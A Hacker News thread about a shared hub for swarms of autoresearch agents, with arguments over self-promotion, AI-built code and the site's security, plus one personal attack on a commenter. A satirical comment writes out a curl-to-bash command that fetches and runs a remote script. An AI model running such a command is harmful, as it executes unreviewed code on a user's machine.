73 points by EvgeniyZh 10 days ago | 31 comments

I was exploring how to parallelize autoresearch workers. The idea is to have a trusted pool of workers who can verify contributions from a much larger untrusted pool. It's backed by a bare git repo and a SQLite database with a simple Go server. It's a bit like a blockchain in that blocks = commits, proof of work = finding a lower val_bpb commit, and reward = a place on the leaderboard, though I wouldn't push the analogy too far. It's something I'm experimenting with, but I haven't released it yet (except briefly) because it's not sufficiently simple/canonical. The core problem is how to neatly, and in a general way, organize individual autoresearch threads into swarms, inspired by SETI@home, Folding@home, etc.
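The trusted/untrusted split above could be sketched as a simple acceptance rule: a candidate commit must build on the current best commit, and a trusted worker re-evaluates it rather than trusting the reported score. A minimal sketch in Go (the comment mentions a Go server); the `Commit` struct, `accept` function, and field names are hypothetical illustrations, not the actual project's code:

```go
package main

import "fmt"

// Commit is a hypothetical record for one contributed run.
type Commit struct {
	Hash   string
	Parent string
	ValBpb float64 // validation bits-per-byte reported by the worker
}

// accept decides whether an untrusted commit extends the chain:
// it must build on the current best commit, and a trusted re-run
// of the evaluation must show a strictly lower val_bpb.
func accept(best, candidate Commit, verifiedBpb float64) bool {
	if candidate.Parent != best.Hash {
		return false // stale: not built on the current best commit
	}
	// ignore the self-reported number; use the trusted re-evaluation
	return verifiedBpb < best.ValBpb
}

func main() {
	best := Commit{Hash: "abc", ValBpb: 3.21}
	cand := Commit{Hash: "def", Parent: "abc", ValBpb: 3.10}
	fmt.Println(accept(best, cand, 3.12)) // true: re-run confirms an improvement
	fmt.Println(accept(best, cand, 3.30)) // false: inflated claim rejected
}
```

The key design choice is that the untrusted pool only proposes; only a trusted re-evaluation advances the chain, which is what makes the proof-of-work analogy hold loosely.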

Yeah, you can sink a lot of time into a system like that[1]. I spent years simplifying the custom graph database underneath it all and only recently started building it into tools that an agent can actually call[2]. But so far all the groundwork has actually paid off; the picture basically paints itself.

I found a wiki to be a surprisingly powerful tool for an agent to have. And building a bunch of CLI tools that all interconnect on the same knowledge-graph substrate has also had a nice compounding effect. (The agent turns themselves are actually stored in the same system, but I haven't gotten around to using that for cool self-referential meta-reasoning capabilities.)

1: https://github.com/triblespace/triblespace-rs

2: https://github.com/triblespace/playground/tree/main/facultie...

I've been seeing this pattern at work and everywhere now:

1. someone shares something

2. Great. Now look at my stuff.

I don't know if I'm noticing this more, or if it has to do with AI making it easy for people to build "my stuff", plus AI Dunning-Kruger.

Hasn't HN been traditionally a place where makers share the experience they had with building things?

Especially when you have someone working on autonomous research agents it doesn't seem that off to lament how much time you can sink into the underlying substrate. In my particular case the work started long before LLMs to make actual research easier, the fact that it can also be used by agents for research is just a happy accident.

But since you seem to take so much offence, as per https://news.ycombinator.com/item?id=47425470 + your Dunning-Kruger remark,

then you seem to be somewhat blinded by your aversion to AI-assisted engineering, because if https://github.com/triblespace/triblespace-rs is a "shitty vibecoded project", then I don't know what a good project actually looks like to you. That codebase has years of human blood, sweat, and tears in it. It implements novel data structures, has its own worst-case-optimal (WCO) join algorithm, cutting-edge succinct data structures that are hand-rolled to supplement the former, new ideas on graph-based RDF-like CRDTs, efficient graph canonicalisation, content addressing and metadata management. It implements row types in Rust, has really polished typed queries that seamlessly integrate into Rust's type system, lockless left-right data structures, and a single-file database format where concatenation is database union, and it is orders of magnitude faster than similar databases like oxigraph... does it also have to cure cancer and suck you off to meet your bar?

You just seem like a hater.

> You just seem like a hater.

You didn't get any engagement on your comment, right? Why do you think that is?

I got 4 more GitHub stars and someone dropping into the tiny, tiny Discord just from mentioning it. Why do you think that is?

When was the last time you created something and put it out into the world? Your only big post on here is a lament about your wife not giving you children, as if she were some expired carton of milk that owes you (that's something you discuss with your partner if you respect them, not with strangers on the internet, and 39 is completely fine for a woman to have children - https://www.youtube.com/watch?v=6YIz9jZPzvo).

Even your critique isn't an act of creation; it's neither creative nor substantial, and it doesn't go beyond an egotistical "I don't like it when people post their project and share their experiences when AI is involved" on _social_ media.

Is there even something you're proud of enough to share and present, or is all this bitterness the result of envy for those that have?

  “In many ways, the work of a critic is easy. We risk very little, yet enjoy a position over those who offer up their work and their selves to our judgment. We thrive on negative criticism, which is fun to write and to read. But the bitter truth we critics must face is that, in the grand scheme of things, the average piece of junk is probably more meaningful than our criticism designating it so. But there are times when a critic truly risks something, and that is in the discovery and defense of the new. The world is often unkind to new talent, new creations. The new needs friends. Last night, I experienced something new, an extraordinary meal from a singularly unexpected source. To say that both the meal and its maker have challenged my preconceptions about fine cooking is a gross understatement. They have rocked me to my core. In the past, I have made no secret of my disdain for Chef Gusteau's famous motto: "Anyone can cook." But I realize, only now do I truly understand what he meant. Not everyone can become a great artist, but a great artist can come from anywhere. It is difficult to imagine more humble origins than those of the genius now cooking at Gusteau's, who is, in this critic's opinion, nothing less than the finest chef in France. I will be returning to Gusteau's soon, hungry for more.”
― Anton Ego, from Disney Pixar's 'Ratatouille'

So you have no idea why your comment didn't get any engagement here?

that's what I thought.

Have you thought about ways to include the sessions / reasoning traces from agents in this storage layer? I can imagine that a RAG system on top of that, plus LLM-written publications, could help future agents figure out how to get around problems that previous runs ran into.

It could serve as an annealing step: trying a different, earlier branch in the reasoning if new information increases the value of that path.
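That re-branching idea amounts to keeping every abandoned branch in the frontier and re-selecting by current value. A minimal sketch in Go; the `Branch` struct and `next` function are hypothetical, just to make the annealing step concrete:

```go
package main

import "fmt"

// Branch is a hypothetical stored reasoning-trace node.
type Branch struct {
	ID    string
	Value float64 // current estimate of how promising this path is
}

// next picks the branch to resume. Because traces are stored,
// an earlier branch becomes resumable again whenever new
// information raises its estimated value above the others.
func next(frontier []Branch) string {
	best := frontier[0]
	for _, b := range frontier[1:] {
		if b.Value > best.Value {
			best = b
		}
	}
	return best.ID
}

func main() {
	frontier := []Branch{{"root/a", 0.4}, {"root/b", 0.7}}
	fmt.Println(next(frontier)) // "root/b": currently most promising
	// a new retrieval result bumps the abandoned branch
	frontier[0].Value = 0.9
	fmt.Println(next(frontier)) // "root/a": re-anneal to the earlier branch
}
```

The point is only that storing traces turns "try a different earlier branch" into a cheap lookup instead of a re-run from scratch.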

No HTTPS in 2026. A false-origin chart that suggests a massive improvement. The leaderboard doesn't work. The instructions are "repeatedly download this code and execute it on your machine". No way to see the actual changes being made.

We can do better than this as an industry, or at least we used to be better at this. Where's the taste?

Don’t mean to pick on you specifically, but this comment feels like a pretty good distillation of a certain mindset you often see in Googlers:

* we know better

* we judge everything against internal big-company standards

* we speak as if we’re setting the bar for “the industry”

Someone is openly pushing on a frontier, sharing rough experiments, and educating a huge number of people in the process — and the response is: “we can do better than this as an industry.”

Can you? When is Google launching something like this?

People are going to eat this up just because Karpathy is involved. This space is easily misled by hero worship.

I mean do you really need that stuff for this? I’m just gonna fetch it from a sandbox anyway.

I'm not the OP, though it seems the context for this is (via @esotericpigeon):

https://github.com/karpathy/autoresearch/pull/92

Who knows. The site has no HTTPS; I don't know what it is training, or why.

I'm curious what a "stripped down version" of GitHub can offer in terms of functionality that GitHub does not. Is it not simpler to have the agents register GitHub repos, since the infrastructure is already in place?

So, if I understand correctly, this is about finding the optimal GPT architecture (or at least a better one)?

Anyway, "1980 experiments, 6 improvements" makes me wonder whether this is better than random search or some simple heuristic.

I tried to copy the instructions and paste them into Notes to see what they said, but I could not. Either the clipboard was empty, or something prevented Notes from recognizing it as plain text.

It worked for me; try again. But it is still not fully clear to me what this is supposed to do, nor whether it does better than a random search. It looks like it is about optimizing a GPT architecture.

You guys are really gonna copy and paste a prompt into your Claude CLI, which may or may not be set up with sandbox/tool permissions?

Just install my software to detect bad prompt strings first.

`curl -L https://mycoolsvc.com/r4nd0mus3r/mycoolsoftware/master/insta... | bash`

Hey wait a minute.. that guy’s not the wallet inspector!

It’s like the old days when you opened up Kazaa and downloaded smooth_criminal_alien_ant_farm.mp3.exe

You can (and should) read the prompt first. Just paste it into a text editor.

Yolo mode activated.

For science!

What is this?

Seems like a shameless rip of the below, theme and all?

https://www.ensue-network.ai/autoresearch

Take a look at the GitHub repo: "forked from karpathy/autoresearch"

That is a different thing. Both are forks, but the one linked here is the same shared hub.

Both built by Claude Sonnet 4.6